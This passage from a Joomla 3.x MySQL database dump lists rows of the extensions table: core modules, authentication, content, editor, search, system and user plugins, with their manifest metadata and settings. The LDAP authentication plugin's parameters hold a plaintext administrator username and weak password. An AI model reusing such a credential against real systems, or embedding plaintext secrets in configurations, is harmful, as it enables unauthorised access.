reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_quickicon\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,0,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_status\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,0,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_submenu\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,0,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_title\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,0,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_toolbar\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,0,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_multilangstatus\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,0,'mod_version','module','mod_version','',1,1,1,0,'{\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_version\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(315,0,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats_admin\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(316,0,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_popular\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(317,0,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_similar\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(318,0,'mod_sampledata','module','mod_sampledata','',1,1,1,0,'{\"name\":\"mod_sampledata\",\"type\":\"module\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"MOD_SAMPLEDATA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sampledata\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(319,0,'mod_latestactions','module','mod_latestactions','',1,1,1,0,'{\"name\":\"mod_latestactions\",\"type\":\"module\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_LATESTACTIONS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latestactions\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(320,0,'mod_privacy_dashboard','module','mod_privacy_dashboard','',1,1,1,0,'{\"name\":\"mod_privacy_dashboard\",\"type\":\"module\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_PRIVACY_DASHBOARD_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_privacy_dashboard\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(400,0,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"gmail\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,0,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','','','',0,'0000-00-00 00:00:00',0,0),(402,0,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ldap\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(403,0,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','','','',0,'0000-00-00 00:00:00',1,0),(404,0,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"emailcloak\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(406,0,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"loadmodule\"}','{\"style\":\"xhtml\"}','','',0,'2011-09-18 15:22:50',0,0),(407,0,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,0,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,0,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,0,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagenavigation\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,0,'plg_content_vote','plugin','vote','content',0,1,1,0,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"vote\"}','','','',0,'0000-00-00 00:00:00',6,0),(410,0,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"Copyright (C) 2014 - 2017 by Marijn Haverbeke <marijnh@gmail.com> and others\",\"authorEmail\":\"marijnh@gmail.com\",\"authorUrl\":\"https:\\/\\/codemirror.net\\/\",\"version\":\"5.56.0\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"codemirror\"}','{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,0,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"September 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"none\"}','','','',0,'0000-00-00 00:00:00',2,0),(412,0,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,0,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2020\",\"author\":\"Tiny Technologies, Inc\",\"copyright\":\"Tiny Technologies, Inc\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"https:\\/\\/www.tiny.cloud\",\"version\":\"4.5.12\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tinymce\"}','{\"mode\":\"1\",\"skin\":\"0\",\"mobile\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"1\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet,iframe\",\"extended_elements\":\"\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"1\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"hr\":\"1\",\"link\":\"1\",\"media\":\"1\",\"print\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"alignment\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,0,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"article\"}','','','',0,'0000-00-00 00:00:00',1,0),(414,0,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"image\"}','','','',0,'0000-00-00 00:00:00',2,0),(415,0,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','','','',0,'0000-00-00 00:00:00',3,0),(416,0,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"readmore\"}','','','',0,'0000-00-00 00:00:00',4,0),(417,0,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,0,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,0,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,0,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,0,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagefilter\"}','{\"detect_browser\":\"0\",\"automatic_change\":\"1\",\"item_associations\":\"1\",\"remove_default_prefix\":\"0\",\"lang_cookie\":\"0\",\"alternate_meta\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(423,0,'plg_system_p3p','plugin','p3p','system',0,1,1,0,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"p3p\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,0,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cache\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',9,0),(425,0,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"debug\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,0,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"log\"}','','','',0,'0000-00-00 00:00:00',5,0),(427,0,'plg_system_redirect','plugin','redirect','system',0,0,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"redirect\"}','','','',0,'0000-00-00 00:00:00',1,0),(428,0,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"remember\"}','','','',0,'0000-00-00 00:00:00',7,0),(429,0,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sef\"}','','','',0,'0000-00-00 00:00:00',8,0),(430,0,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logout\"}','','','',0,'0000-00-00 00:00:00',3,0),(431,0,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,0,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contactcreator\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,0,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"strong_passwords\":\"1\",\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,0,'plg_user_profile','plugin','profile','user',0,0,1,0,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"profile\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,0,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','','','',0,'0000-00-00 00:00:00',1,0),(435,0,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','','','',0,'0000-00-00 